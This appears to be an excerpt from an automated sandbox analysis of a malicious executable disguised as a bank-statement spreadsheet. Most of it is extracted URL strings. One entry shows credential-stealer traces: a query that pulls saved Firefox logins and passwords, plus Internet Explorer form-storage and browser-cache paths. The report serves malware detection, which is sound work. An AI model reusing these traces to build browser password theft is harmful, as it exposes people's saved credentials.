                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: BANK-STATMENT _xlsx.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: vbc.exe, 00000007.00000003.704761625.000000000095E000.00000004.00000001.sdmp, vbc.exe, 0000001A.00000003.837983424.00000000009CE000.00000004.00000001.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                Source: vbc.exe, 00000007.00000003.704761625.000000000095E000.00000004.00000001.sdmp, vbc.exe, 0000001A.00000003.837983424.00000000009CE000.00000004.00000001.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: 201.75.14.0.in-addr.arpa
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: vbc.exe, 0000001A.00000002.838399630.000000000076E000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.ak
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                Source: BANK-STATMENT _xlsx.exe, BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.801748838.0000000002B0E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884820790.0000000002B4E000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.915036172.0000000002C3E000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.comx&
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670079069.0000000005123000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670678801.0000000005126000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.671131128.0000000005127000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com#
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.671889636.00000000050FB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670925242.00000000050FC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comc
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670678801.0000000005126000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comg
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670678801.0000000005126000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsig
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.670800155.0000000005106000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comz
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773005820.0000000005100000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com)
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.675887823.000000000512B000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.675857787.000000000512A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676434970.0000000005128000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersS
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676177368.0000000005121000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.682397058.0000000005121000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersno
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.674765089.0000000005121000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerst
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.675782658.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomF
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773005820.0000000005100000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.675782658.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoitu
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.676664424.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueed
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.669103284.0000000005122000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.669521206.0000000005105000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.668963519.000000000510A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn7
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn8
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnD
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.669162564.0000000005122000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnZ
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.669404161.0000000005123000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.668963519.000000000510A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnrb
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.678233333.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.678233333.00000000050FF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/S
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.773771914.0000000005260000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.672193622.00000000050FB000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.804652091.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.858940820.00000000050E0000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.887749942.0000000005220000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.917199610.0000000005250000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w7
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/E
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/N
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.671578581.00000000050F4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Norm
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0nt
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000003.672478858.00000000050FA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0s
